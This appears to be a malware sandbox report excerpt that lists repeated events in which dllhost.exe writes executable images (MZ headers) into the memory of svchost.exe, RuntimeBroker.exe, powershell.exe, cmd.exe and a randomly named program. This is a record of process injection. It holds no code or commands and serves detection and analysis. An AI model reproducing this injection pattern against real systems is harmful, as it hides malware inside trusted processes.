Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E97F230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1217AF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A680850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 192A3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 294E53C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1661BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 830000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 11F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 208442D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20E8B1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27B67E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 175F9950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DB9D660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1CC91450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 261C3DC0000 value starts with: 4D5A
